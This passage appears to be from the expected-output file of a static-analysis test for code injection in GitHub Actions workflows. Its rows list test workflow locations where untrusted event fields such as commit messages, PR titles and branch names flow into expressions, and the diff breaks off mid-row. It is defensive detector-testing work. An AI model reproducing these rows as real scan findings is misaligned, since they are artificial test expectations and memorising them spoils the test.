.github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | -| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | -| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | -| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | -| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | -| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | -| .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | -| .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | -| .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | -| .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | -| .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | -| .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | -| .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | -| .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | -| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | -| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | -| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | -| .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | edges | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | provenance | | | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | provenance | | @@ -756,3 +697,62 @@ nodes subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | +#select +| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | ${{ inputs.spelling }} | +| .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | ${{ inputs.github_username }} | +| .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | ${{ inputs.github_email }} | +| .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | ${{ github.head_ref \|\| github.ref }} | +| .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | +| .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | ${{ steps.changed-files3.outputs.all_changed_files }} | +| .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | ${{ steps.changed-files5.outputs.all_changed_files }} | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | +| .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | +| .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | +| .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | +| .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | +| .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | +| .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | +| .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | +| .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | 